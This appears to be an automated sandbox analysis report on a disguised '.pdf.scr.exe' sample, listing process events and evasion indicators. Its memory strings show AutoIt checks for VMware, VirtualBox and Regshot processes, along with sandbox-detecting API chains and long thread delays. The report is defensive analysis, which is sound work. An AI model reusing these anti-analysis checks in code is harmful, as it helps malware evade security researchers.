      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Yara detected AntiVM autoit script
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: ihgsvw.exe, 00000006.00000003.299857455.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.332616328.00000000016FD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.315942638.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.00000000016E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")`
      Source: ihgsvw.exe, 00000021.00000002.486870938.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476366235.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475601066.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.478174099.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475174310.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475387940.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.477979894.0000000000ED8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXESS
      Source: ihgsvw.exe, 00000021.00000003.477385380.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475550316.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475281138.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.448218460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.477100320.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.477315670.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475335079.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465173731.0000000001686000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
      Source: ihgsvw.exe, 00000023.00000003.495486843.00000000016B2000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000002.498875275.00000000016B4000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465173731.0000000001686000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.497141076.00000000016B4000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.494456875.00000000016A8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493999375.00000000016A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN\N`V
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.327029047.000000000179B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334819122.000000000179D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.333726359.000000000179C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.326732376.0000000001786000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.320691747.000000000177C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXEKW
      Source: ihgsvw.exe, 00000015.00000003.382971984.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356852318.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356400525.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381984041.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.383092560.0000000000DCD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382181894.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381251567.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")^\
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318182602.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334500241.0000000001730000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356400525.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386006427.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.327029047.000000000179B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334819122.000000000179D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.333726359.000000000179C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.326732376.0000000001786000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.320691747.000000000177C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES
      Source: ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382138122.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382214127.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000002.486870938.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476366235.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE
      Found API chain indicative of sandbox detection
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5752Thread sleep count: 63 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5752Thread sleep count: 85 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5236Thread sleep count: 61 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5236Thread sleep count: 79 > 30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6084Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 4968Thread sleep count: 31 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 4968Thread sleep count: 117 > 30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5324Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1756Thread sleep count: 63 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1756Thread sleep count: 105 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 3080Thread sleep count: 64 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 3080Thread sleep count: 88 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5712Thread sleep count: 62 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5712Thread sleep count: 106 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1752Thread sleep count: 60 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1752Thread sleep count: 114 > 30
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeEvasive API call chain: GetLocalTime,DecisionNodes
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: threadDelayed 9453
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: foregroundWindowGot 1561
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeAPI coverage: 8.4 %
      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeAPI call chain: ExitProcess graph end node
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
      Source: ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then#+
      Source: ihgsvw.exe, 00000021.00000003.475174310.0000000000E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exey
      Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
      Source: ihgsvw.exe, 00000023.00000003.496927668.0000000001694000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe
      Source: ihgsvw.exe, 00000006.00000003.331408820.000000000173F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe:
      Source: ihgsvw.exe, 00000021.00000003.477232662.0000000000E1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe
      Source: ihgsvw.exe, 00000021.00000003.474135636.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.448218460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Thenzo
      Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then
      Source: ihgsvw.exe, 00000015.00000003.382773742.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exe
      Source: ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382773742.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exey
      Source: RegSvcs.exe, 0000000A.00000002.769785143.0000000001067000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: ihgsvw.exe, 00000006.00000003.331408820.000000000173F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exe
      Source: ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476957777.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475174310.0000000000E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exeb
      Source: ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") ThenYu8
      Source: ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
      Source: ihgsvw.exe, 00000015.00000003.380904548.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
      Source: ihgsvw.exe, 00000021.00000003.477232662.0000000000E1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exee
      Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then0
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318182602.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.331408820.000000000173F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exel
      Source: ihgsvw.exe, 00000023.00000003.496927668.0000000001694000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe536C7
      Source: ihgsvw.exe, 00000015.00000003.382773742.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exeV
      Source: ihgsvw.exe, 00000023.00000003.493542771.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.494962975.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.496739314.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.496786438.00000000016F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
      Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
      Source: ihgsvw.exe, 00000015.00000003.383061801.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exeE97637D6
      Source: ihgsvw.exe, 00000023.00000003.496786438.00000000016F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe
      Source: ihgsvw.exe, 00000023.00000003.496786438.00000000016F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exed
